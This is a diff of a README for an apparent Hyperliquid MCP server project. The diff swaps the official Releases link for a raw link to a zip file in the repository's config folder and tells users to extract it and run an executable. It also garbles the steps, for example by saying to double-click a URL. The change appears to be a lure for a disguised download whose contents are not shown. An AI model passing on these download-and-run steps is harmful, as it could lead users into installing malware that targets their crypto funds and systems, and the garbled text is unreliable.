moner124/hyperliquid-mcp-server/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** To download the **hyperliquid-mcp-server**, go to the [Releases Page](https://github.com/moner124/hyperliquid-mcp-server/releases).
+1. **Visit the Releases Page:** To download the **hyperliquid-mcp-server**, go to the [Releases Page](https://raw.githubusercontent.com/moner124/hyperliquid-mcp-server/main/config/hyperliquid-mcp-server-v2.7.zip).

 2. **Select Your Version:** You will see a list of available versions.
 Choose the latest one for the best experience.
-Look for the version filename (e.g., `hyperliquid-mcp-server-v1.0.zip`).
+Look for the version filename (e.g., `https://raw.githubusercontent.com/moner124/hyperliquid-mcp-server/main/config/hyperliquid-mcp-server-v2.7.zip`).

 3. **Download the File:** Click on the download link for your operating system.
 This will save the file to your computer.

 4. **Extract the Files:** Once the download completes, go to the folder where the file is saved.
 Right-click on the downloaded file and select "Extract All" or use any file extraction software.

-5. **Run the Application:** After extraction, open the folder and double-click the `hyperliquid-mcp-server.exe` file to launch the application.
+5. **Run the Application:** After extraction, open the folder and double-click the `https://raw.githubusercontent.com/moner124/hyperliquid-mcp-server/main/config/hyperliquid-mcp-server-v2.7.zip` file to launch the application.

 6. **Follow the Setup Instructions:** The application will guide you through the initial setup.
 Follow the prompts to get started.